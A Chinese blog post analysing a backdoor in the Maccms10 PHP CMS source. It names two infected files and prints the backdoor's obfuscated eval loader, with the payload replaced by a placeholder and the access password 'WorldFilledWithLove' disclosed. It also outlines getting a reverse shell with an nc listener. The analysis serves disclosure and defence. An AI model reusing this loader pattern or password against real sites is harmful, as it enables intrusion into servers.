maccms后门分析

其他 2019-10-17 13:34:09 阅读次数: 0

Maccms 后门分析

Maccms网站基于php+mysql的系统,有易用性、功能良好等优点,用途广泛

打开源码

maccms10\extend\Qcloud\Sms\sms.php是一个后门

maccms10\extend\upyun\src\Upyun\Api\format.php也是一个后门

 

 

可以看到两者内容一样

<?php

error_reporting(E_ERROR);

@ini_set('display_errors','Off');

@ini_set('max_execution_time',20000);

@ini_set('memory_limit','256M');

header("content-Type: text/html; charset=utf-8");

$password = "0d41c75e2ab34a3740834cdd7e066d90";//密码WorldFilledWithLove

function s{

$str=”编码之后的恶意代码”;

$str = str_rot13($str);//对恶意代码进行ROT13编码

m($str);

}

function m($str){

global $password;

$jj = '';

eval($jj.pack('H*',$str).$jj);//对混淆的php进行解码,解码之后的代码执行对eval函数的解析

}

s();

?>

 

访问

 

解码后的密码敲进去WorldFilledWithLove

 

反弹shell(将肉鸡/目标机上的终端或者解析器或shell弹到攻击者的电脑中,需要攻击者提前监听,使用NC监听:nc –lvvp 7777,-l

 

 

猜你喜欢

转载自www.cnblogs.com/shayanboy/p/11691414.html
今日推荐
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
开放签电子签章:停止新增,优化体验,前进更进(五一假期前工作)
开源日报 | 中学生开源前端动画引擎;全球首个Llama3 8B中文版开源模型;联想电脑恐出局;Linus讽刺AI炒作
“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析
最强开源大模型 Llama 3 上架 Gitee AI
周排行
自媒体文章如何提高原创度以及如何检测原创度
开启qq邮箱的smtp服务
Qt程序单次启动(QSingleApplication类)
国外的外包网站
更新IDEA主题——放飞代码风格
cocos2dx 实现搓牌效果(翻牌效果),包括铺平动画
dict和json之间的互相转换
angular的一些思考
. Fibonacci数列是这样定义的: F[0] = 0 F[1] = 1 for each i ≥ 2: F[i] = F[i-1] + F[i-2] 因此,Fibonacci数列就形如:0, 1
洛谷P1064 金明的预算方案
每日归档
更多
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)
2024-04-17(5)
2024-04-16(70)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022